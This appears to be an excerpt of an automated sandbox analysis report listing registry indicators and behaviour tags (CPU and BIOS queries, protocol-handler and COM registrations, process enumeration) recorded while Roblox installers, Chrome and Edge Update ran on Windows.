Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Enumerates system info in registry 2 TTPs 17 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer RobloxStudioInstaller.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS RobloxStudioBeta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedgewebview2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS RobloxStudioInstaller.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS RobloxStudioInstaller.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer RobloxStudioBeta.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedgewebview2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedgewebview2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer RobloxPlayerInstaller.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS RobloxPlayerInstaller.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer RobloxStudioInstaller.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio-auth RobloxStudioInstaller.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio-auth\WarnOnOpen = "0" RobloxStudioInstaller.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio RobloxStudioInstaller.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio\WarnOnOpen = "0" RobloxStudioInstaller.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio RobloxPlayerInstaller.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio\WarnOnOpen = "0" RobloxPlayerInstaller.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player\WarnOnOpen = "0" RobloxPlayerInstaller.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player RobloxPlayerInstaller.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox RobloxPlayerInstaller.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox\WarnOnOpen = "0" RobloxPlayerInstaller.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\PROTOCOLEXECUTE\ROBLOX-STUDIO RobloxStudioInstaller.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeUpdate.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133639185514937027" chrome.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache MicrosoftEdgeUpdate.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot MicrosoftEdgeUpdate.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix MicrosoftEdgeUpdate.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdgeUpdate.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ MicrosoftEdgeUpdate.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeUpdate.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeUpdate.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeUpdate.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing MicrosoftEdgeUpdate.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed MicrosoftEdgeUpdate.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\ = "IAppBundle" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\NumMethods\ = "4" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CoreMachineClass\CurVer\ = "MicrosoftEdgeUpdate.CoreMachineClass.1" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\VersionIndependentProgID MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ = "IAppCommand" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\NumMethods\ = "23" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}\ProxyStubClsid32\ = "{0DD41A78-E3D4-44A8-9EAE-697BCF1781A3}" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\ = "IPolicyStatus" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassMachine.1.0\CLSID\ = "{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\ = "IGoogleUpdate3" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\ = "IGoogleUpdateCore" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\ = "IPolicyStatus" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ = "IProcessLauncher2" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\ProxyStubClsid32 MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{60355531-5BFD-45AB-942C-7912628752C7}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E3D94CEB-EC11-46BE-8872-7DDCE37FABFA}\InprocHandler32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\psmachine_64.dll" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusMachine\CurVer\ = "MicrosoftEdgeUpdate.PolicyStatusMachine.1.0" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\NumMethods\ = "10" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837} MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods\ = "10" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\ProgID MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\ProxyStubClsid32\ = "{0DD41A78-E3D4-44A8-9EAE-697BCF1781A3}" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E} MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\ProxyStubClsid32 MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3805CA06-AC83-4F00-8A02-271DCD89BDEB}\ = "IPolicyStatus5" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\ = "IAppVersion" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\ = "IAppWeb" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.ProcessLauncher MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\NumMethods\ = "41" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\ = "ICoCreateAsync" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F} MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3COMClassService.1.0\CLSID MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\ = "IAppBundleWeb" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\NumMethods\ = "17" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\Elevation MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\NumMethods\ = "4" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2} MicrosoftEdgeUpdate.exe Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 6b33415f21c8da01 MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\NumMethods MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB} MicrosoftEdgeUpdate.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\NumMethods MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ = "IAppVersionWeb" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusMachineFallback\CurVer\ = "MicrosoftEdgeUpdate.PolicyStatusMachineFallback.1.0" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ = "IAppCommand" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebMachineFallback.1.0\ = "Microsoft Edge Update Update3Web" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69} MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\MicrosoftEdgeUpdateBroker.exe\"" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\Elevation\IconReference = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\msedgeupdate.dll,-1004" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\NumMethods\ = "10" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}\VersionIndependentProgID\ = "MicrosoftEdgeUpdate.Update3WebMachineFallback" MicrosoftEdgeUpdate.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2372 RobloxStudioBeta.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 1452 chrome.exe 1452 chrome.exe 4880 chrome.exe 4880 chrome.exe 1852 RobloxPlayerInstaller.exe 1852 RobloxPlayerInstaller.exe 4872 MicrosoftEdgeUpdate.exe 4872 MicrosoftEdgeUpdate.exe 3932 chrome.exe 3932 chrome.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 4872 MicrosoftEdgeUpdate.exe 4872 MicrosoftEdgeUpdate.exe 4872 MicrosoftEdgeUpdate.exe 4872 MicrosoftEdgeUpdate.exe 580 